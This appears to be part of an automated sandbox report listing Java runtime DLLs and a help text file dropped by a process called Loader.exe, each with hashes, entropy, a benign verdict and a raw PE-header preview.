                                                                                                                                                                                                                                                                                                              SHA1:177A216B71C9902E254C0A9908FCB46E8D5801A9
                                                                                                                                                                                                                                                                                                              SHA-256:30EB581C99C8BCBC54012AA5E6084B6EF4FCEE5D9968E9CC51F5734449E1FF49
                                                                                                                                                                                                                                                                                                              SHA-512:AB3F4E3851313391B5B8055E4D526963C38C4403FA74FB70750CC6A2D5108E63A0E600978FA14A7201C48E1AFD718A1C6823D091C90D77B17562B7A4C8C40365
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q.Q...?...?...?......?.......?.......?.z...?.......?.......?...>.;.?.....s.?.....w.?.......?.......?.......?.Rich..?.........................PE..L...nPjW...........!................,G.............m.........................P......Y.....@.................................,{...........N..............@....P......................................v..@............... ....V..`....................text...<........................... ..`.rdata.............................@..@.data...8....@...~...2..............@....rsrc....N.......P..................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\bci.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15424
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.380726588633652
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:1Td3hw/L3kKLnYgIOGOOssnPV5Lnf6onYPLr7EbH:1zw/bkKLt7KnddnfPC7S
                                                                                                                                                                                                                                                                                                              MD5:A46289384F76C2A41BA7251459849288
                                                                                                                                                                                                                                                                                                              SHA1:4D8EF96EDBE07C8722FA24E4A5B96EBFA18BE2C4
                                                                                                                                                                                                                                                                                                              SHA-256:728D64BC1FBF48D4968B1B93893F1B5DB88B052AB82202C6840BF7886A64017D
                                                                                                                                                                                                                                                                                                              SHA-512:34D62BEB1FA7D8630F5562C1E48839CE9429FAEA980561E58076DF5F19755761454EEB882790EC1035C64C654FC1A8CD5EB46ECA12E2BC81449ACBB73296C9E8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W..W..W../x.W...w.W..W..W....s.W...u.W...@.W...A.W...p.W...q.W...v.W..Rich.W..........................PE..L...nPjW...........!......................... .....m.........................`.......9....@..........................'......|$..<....@...............$..@....P....... ..............................8#..@............ ...............................text............................... ..`.rdata..v.... ......................@..@.data...p....0......................@....rsrc........@......................@..@.reloc.......P......."..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\client\Xusage.txt

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1447
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.228834598358894
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:+3AKdmzfuv6pBSyGJkR/4o6kn2SRGehD+GrspGC/hLRra:BzMUBLGJkBA+RGeV+GrspGC/TO
                                                                                                                                                                                                                                                                                                              MD5:F4188DEB5103B6D7015B2106938BFA23
                                                                                                                                                                                                                                                                                                              SHA1:8E3781A080CD72FDE8702EB6E02A05A23B4160F8
                                                                                                                                                                                                                                                                                                              SHA-256:BD54E6150AD98B444D5D24CEA9DDAFE347ED11A1AAE749F8E4D59C963E67E763
                                                                                                                                                                                                                                                                                                              SHA-512:0BE9A00A48CF8C7D210126591E61531899502E694A3C3BA7C3235295E80B1733B6F399CAE58FB4F7BFF2C934DA7782D256BDF46793F814A5F25B7A811D0CB2E3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview: -Xmixed mixed mode execution (default).. -Xint interpreted mode execution only.. -Xbootclasspath:<directories and zip/jar files separated by ;>.. set search path for bootstrap classes and resources.. -Xbootclasspath/a:<directories and zip/jar files separated by ;>.. append to end of bootstrap class path.. -Xbootclasspath/p:<directories and zip/jar files separated by ;>.. prepend in front of bootstrap class path.. -Xnoclassgc disable class garbage collection.. -Xincgc enable incremental garbage collection.. -Xloggc:<file> log GC status to a file with time stamps.. -Xbatch disable background compilation.. -Xms<size> set initial Java heap size.. -Xmx<size> set maximum Java heap size.. -Xss<size> set java thread stack size.. -Xprof output cpu profiling data.. -Xfuture enable strictest checks, an

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\client\jvm.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3857984
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.850425436805504
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:98304:GyXul1SNceWfkD000V3wnIACM7g6cv/GZ:Q1SgfEP0ZwnIA97dcv/GZ
                                                                                                                                                                                                                                                                                                              MD5:39C302FE0781E5AF6D007E55F509606A
                                                                                                                                                                                                                                                                                                              SHA1:23690A52E8C6578DE6A7980BB78AAE69D0F31780
                                                                                                                                                                                                                                                                                                              SHA-256:B1FBDBB1E4C692B34D3B9F28F8188FC6105B05D311C266D59AA5E5EC531966BC
                                                                                                                                                                                                                                                                                                              SHA-512:67F91A75E16C02CA245233B820DF985BD8290A2A50480DFF4B2FD2695E3CF0B4534EB1BF0D357D0B14F15CE8BD13C82D2748B5EDD9CC38DC9E713F5DC383ED77
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$=.$`\.w`\.w`\.w{.Twb\.w..Pwf\.w{.Vwl\.w{.bwl\.wi$[wo\.w`\.w}].w{.cw-^.w{.Swa\.w{.Rwa\.w{.Uwa\.wRich`\.w........PE..L...nPjW...........!......,...........+.......,....m..........................<......q;...@...........................4.......4.......9.(.............:.@.... 9..G....,..............................t2.@.............,.P............................text.....+.......,................. ..`.rdata..Y.....,.......,.............@..@.data...d.....5..*....4.............@....rsrc...(.....9......"7.............@..@.reloc..\.... 9......(7.............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dcpr.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):142912
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.350682736920136
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:aoGzTjLkRPQ9U9NuLqcNicj5ojGylYCE2Iu2jGLF5A9bE8LUekfCz:LGz/oRPGLJN1IGgYCE2L1F5A9bEGUeR
                                                                                                                                                                                                                                                                                                              MD5:4BDC32EF5DA731393ACC1B8C052F1989
                                                                                                                                                                                                                                                                                                              SHA1:A677C04ECD13F074DE68CC41F13948D3B86B6C19
                                                                                                                                                                                                                                                                                                              SHA-256:A3B35CC8C2E6D22B5832AF74AAF4D1BB35069EDD73073DFFEC2595230CA81772
                                                                                                                                                                                                                                                                                                              SHA-512:E71EA78D45E6C6BD08B2C5CD31F003F911FD4C82316363D26945D17977C2939F65E3B9748447006F95C3C6653CE30D2CDA67322D246D43C9EB892A8E83DEB31A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..K.c.K.c.K.c.Br..I.c.P...H.c.P...I.c.P...N.c.K.b.m.c.P...m.c.P...J.c.P...J.c.P...J.c.RichK.c.........................PE..L...nPjW...........!.........Z......V.............Sm.........................@.......!....@.................................<...P.... ..................@....0..........................................@............................................text...n........................... ..`.rdata........... ..................@..@.data....+.......(..................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\decora_sse.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):64064
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.338192715882019
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:Skh2CQuUlng7qkKi5iO8pm8cN9qOU33oit:Skkhu0nTli5jN8cNAOUHnt
                                                                                                                                                                                                                                                                                                              MD5:B04ABE76C4147DE1D726962F86473CF2
                                                                                                                                                                                                                                                                                                              SHA1:3104BADA746678B0A88E5E4A77904D78A71D1AB8
                                                                                                                                                                                                                                                                                                              SHA-256:07FF22E96DCFD89226E5B85CC07C34318DD32CDA23B7EA0474E09338654BFEB3
                                                                                                                                                                                                                                                                                                              SHA-512:2E4E2FEB63B6D7388770D8132A880422ABF6A01941BFF12CAD74DB4A641BDA2DCC8BF58F6DAE90E41CC250B79E7956DDF126943E0F6200272F3376A9A19505F1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{.|.{.|.{.|..N..y.|.{.}.g.|.v.x.|.v.y.|.v.w.|.v.y.|....Z.|....z.|.v.z.|....z.|.Rich{.|.........................PE..L...nPjW...........!......... ......_.............Vm......................... .......*....@.....................................<.......................@...........................................(...@...............t............................text............................... ..`.rdata..............................@..@.data...\...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\deploy.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):453184
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.516599034237354
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:3J/sbugq7rm5zX2JDYfiA9+wvpsEWcIGnFm8iTFOBITfnvxIW1x8:3JUbzq+5zX25qvdfnFm88nvq+x8
                                                                                                                                                                                                                                                                                                              MD5:5EDAEFFC60B5F1147068E4A296F6D7FB
                                                                                                                                                                                                                                                                                                              SHA1:7D36698C62386449A5FA2607886F4ADF7FB3DEEF
                                                                                                                                                                                                                                                                                                              SHA-256:87847204933551F69F1CBA7A73B63A252D12EF106C22ED9C561EF188DFFCBAE8
                                                                                                                                                                                                                                                                                                              SHA-512:A691EF121D3AC17569E27BB6DE4688D3506895B1A1A8740E1F16E80EEFCE70BA18B9C1EFD6FD6794FAFC59BA2CAF137B4007FCDC65DDB8BCBFCF42C97B13535B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T...:...:...:.......:.e....:......:......:.....:....:....:...;.`.:......:.......:.......:.......:.Rich..:.................PE..L...oPjW...........!.........:......n.............Xm................................-.....@.........................@...\6..............................@.......|8..................................Xh..@...............X...8........................text............................... ..`.rdata...;.......<..................@..@.data...............................@....rsrc...............................@..@.reloc..ZE.......F..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dt_shmem.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):25152
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.627329311560644
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:0mgNWEfK0RiC4qxJL8VI6ZEPG5Vv/11nYPLr7N:H6WmK0RiSxJ4VI6W+zbC7N
                                                                                                                                                                                                                                                                                                              MD5:72B7054811A72D9D48C95845F93FCD2C
                                                                                                                                                                                                                                                                                                              SHA1:D25F68566E11B91C2A0989BCC64C6EF17395D775
                                                                                                                                                                                                                                                                                                              SHA-256:D4B63243D1787809020BA6E91564D17FFEA4762AF99201E241F4ECD20108D2E8
                                                                                                                                                                                                                                                                                                              SHA-512:C6A16DAAF856939615DFDE8E9DBE9D5BFC415507011E85E44C6BF88B17B705C35CD7CED8EDA8F358745063F41096938D128DEE17E14FE93252E5B046BDFCDDC0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..cK.cK.cK....cK....cK.cJ.cK....cK....cK....cK....cK....cK....cK.Rich.cK.........PE..L...nPjW...........!.....*...........4.......@....|m................................:6....@.........................0M.......H..<....p...............J..@............A...............................F..@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data........`.......@..............@....rsrc........p.......B..............@..@.reloc..z............F..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dt_socket.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):21568
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.601333059222365
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:QwiAYZIxsQbbRLEs5Ltd7rpPVJfq0nYPLr7Ko+:BiPZj+bVEmtd7rpdJfnC7J+
                                                                                                                                                                                                                                                                                                              MD5:73603BF0DC85CAA2F4C4A38B9806EC82
                                                                                                                                                                                                                                                                                                              SHA1:74EBC4F158936842840973F54AF50CDF46BC9096
                                                                                                                                                                                                                                                                                                              SHA-256:39EF85AB21F653993C8AAAB2A487E8909D6401A21F27CBA09283B46556FB16AF
                                                                                                                                                                                                                                                                                                              SHA-512:5C238D677D458D5B7D43FA3FF424E13B62ABFCEDE66D55E3112DC09BF2F7B640EB8F82D00E41A2C7A7E7B36E3FCE3C2DCB060037314418D329466CC462D0BF71
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..<...<...<...'<8.>...'<:.>...'<..>...<...v...5.7.9...'<..1...'<?.=...'<>.=...'<9.=...Rich<...........................PE..L...nPjW...........!.................&.......0....}m................................F.....@..........................A..U....<..P....`...............<..@....p......@1..............................x;..@............0..(............................text............................... ..`.rdata.......0....... ..............@..@.data........P.......2..............@....rsrc........`.......4..............@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dtplugin\deployJava1.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):827456
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.022966185458799
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24576:E0NweWDjb28WNjE/lBy/pUbS3lYMpQIRrAOh3:7Wb5By/pUbouAQIRHh3
                                                                                                                                                                                                                                                                                                              MD5:E741028613B1FC49EC5A899BE6E3FC34
                                                                                                                                                                                                                                                                                                              SHA1:9EAE3D3CA22E92A925395A660B55CECB2EB62D54
                                                                                                                                                                                                                                                                                                              SHA-256:9163A546696E581D443B3A6250F61E5368BE984C69ADFB54EE2B0E51D0FA008E
                                                                                                                                                                                                                                                                                                              SHA-512:05C6CE707F4F0F415E74D32F1AACEC7E2C7746C3D04C75502EAECAFAF9E0108CE6206A8A3939C92EDCE449FFC0A68FB4389EDAA93D61920D1EC85327D1B3A55A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vu.'...t...t...t..Tt...t.lIt...t.lYt...t...t...t}bat...t..`t...t..at{..t..Qt...t..Pt...t..Wt...tRich...t................PE..L...pPjW...........!................T.............`m.....................................@.........................................P..................@....p..\^.....................................@...............X...........................text...,........................... ..`.rdata..8...........................@..@.data....t.......R..................@....rsrc........P......................@..@.reloc..zr...p...t..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\dtplugin\npdeployJava1.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):907328
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.160830535423145
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24576:ZyWOeRjqm9ZRI+Ga+fme7CV93+x6FQ3ge:VRAeMme7kA6F6ge
                                                                                                                                                                                                                                                                                                              MD5:4FD3548990CAF9771B688532DEF5DE48
                                                                                                                                                                                                                                                                                                              SHA1:567C27A4EA16775085D8E87A38FE58BEC4463F7D
                                                                                                                                                                                                                                                                                                              SHA-256:BDE5DF7BCFC35270B57A8982949BF5F25592A2E560A04E9868B84BEF83A0EA4B
                                                                                                                                                                                                                                                                                                              SHA-512:FD2CF2072A786293E30CD495BA06F4734F0CEA63CBC49B6D7A24F6891612375E48D1B5758D9408625E769E8A81C7C34F04278E011BCF47EDEB8C2AFC13AEC20C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............x...x...x....k..x...._..x....v..x....f..x...x...y....^..x....^..x....n..x....o..x....h..x..Rich.x..........................PE..L...nPjW...........!.................D.......0....mm................................t.....@..........................>......."..........................@........c...5..............................p...@............0..4............................text............................... ..`.rdata..T....0......................@..@.data...$Y...@...6...,..............@....rsrc................b..............@..@.reloc...g.......h...X..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\eula.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):109120
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.986571003903383
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:LE9WcstxlDgZ9EYDKg0nc6N3MR+EpOB+o+5PVT/B:ghspgZPDanhs+EpOBF+5PFB
                                                                                                                                                                                                                                                                                                              MD5:A5455B9BEB5672D89B1F0FCFAA4C79CA
                                                                                                                                                                                                                                                                                                              SHA1:9C7DBB5AD1CB3EBE7347A9CDDD80389902DA81EC
                                                                                                                                                                                                                                                                                                              SHA-256:89A429889DCD0F6A3FE56217A0FEB5912132AAB2817643021EAE3716DA533D4A
                                                                                                                                                                                                                                                                                                              SHA-512:131866A4754F4AF78A94F0776815E7EA4375736A4B11A723B87A4436FA101D271FFE14E4B49D3AB1AE2FA61CDBDED0C3D174C75327BE3C24E0E4CC39AFFA9469
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ot....Z...Z...Z..Z...ZC@.Z...Z..Z...Z..Z...Z.v.Z...Z.v.Z...Z...Z...Z.x.Z...Z..Z...Z..Z...Z..Z...Z..Z...ZRich...Z........................PE..L...oPjW...........!..............................~m......................................@.........................P...J............0...t..............@...........P...............................0...@............... ...d...`....................text............................... ..`.rdata...D.......F..................@..@.data...0...........................@....rsrc....t...0...v..................@..@.reloc...............|..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\fontmanager.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):223296
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.501845596055873
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:8P8OC0xbNXLJAEh4hijzud6kAgZkFGMReiDfbgOBI1:8P8OC0xbNXLJAEh4hijzud6kAgYGSA
                                                                                                                                                                                                                                                                                                              MD5:9D5EDECF7E33DDD0E2A6A0D34FC12CA1
                                                                                                                                                                                                                                                                                                              SHA1:FC228A80FF85D78AA5BFBA2515EFED3257B9B009
                                                                                                                                                                                                                                                                                                              SHA-256:6D817519C2E2EFDD3986EB655C1F687D4774730AB20768DF1C0AAEF03B110965
                                                                                                                                                                                                                                                                                                              SHA-512:B4D58D3415D0255DCD87EF413762BC0F2934AAA6C8151344266949D3DD549ABDCA1366FA751A988CDDC1430EBF5D17668ADF02096DD4D5EAFE75604C0DA0B4C9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......wG.s3&. 3&. 3&. .h. 0&. (.. 6&. :^. ;&. (.. 4&. 3&. n&. (.4 n&. (.5 "&. (.. 2&. (.. 2&. (.. 2&. Rich3&. ........PE..L...oPjW...........!.........~.....................m.................................e....@......................... ;.......1.......`...............P..@....p......................................@...@............................................text............................... ..`.rdata...O.......P..................@..@.data........@.......,..............@....rsrc........`.......8..............@..@.reloc..L....p.......<..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\fxplugins.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):151104
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.548096027649263
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:PPuiQNBInyjJ2y53/5d8n9e/ry7zOAHpyWWJd1u2TeKSNlGFGZQfVN2:iBInu2y5P5dkeDy7zOUpLJ2mHZQf2
                                                                                                                                                                                                                                                                                                              MD5:7A710F90A74981C2F060FA361D094822
                                                                                                                                                                                                                                                                                                              SHA1:FBDCA4E3F19AD5201572974E3C772A3C2694FBB3
                                                                                                                                                                                                                                                                                                              SHA-256:9BC52058C02E0C87A6A9470C62D1AA4F998942CC00F99A82E7805E87D958BC16
                                                                                                                                                                                                                                                                                                              SHA-512:928708DFF6A372BA997C072238823469CBFD28CCBB17A723AD35F851D35C6EFF82748AA41A9215955B9536A14AA57D47ABE0F1BA00D11F8D920A57F91B7A35E5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................5......7.....................&.......8.......#.....5.........................4......3.....6.....Rich....................PE..L...oPjW...........!................g..............m.........................p............@.........................0...P............@...............6..@....P..........................................@...............4............................text............................... ..`.rdata...g.......h..................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\glass.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):200768
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.431501859060678
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:lC0MaRHVsSduCCkNlKpR1FHNnuNcCwJPT54l2B3Fzkmldrz5ZD9hYJOj9T3iRK:s0XR1sYtxgGl2B3uWjhYJOj9TSY
                                                                                                                                                                                                                                                                                                              MD5:434CBB561D7F326BBEFFA2271ECC1446
                                                                                                                                                                                                                                                                                                              SHA1:3D9639F6DA2BC8AC5A536C150474B659D0177207
                                                                                                                                                                                                                                                                                                              SHA-256:1EDD9022C10C27BBBA2AD843310458EDAEAD37A9767C6FC8FDDAAF1ADFCBC143
                                                                                                                                                                                                                                                                                                              SHA-512:9E37B985ECF0B2FEF262F183C1CD26D437C8C7BE97AA4EC4CD8C75C044336CC69A56A4614EA6D33DC252FE0DA8E1BBADC193FF61B87BE5DCE6610525F321B6DC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
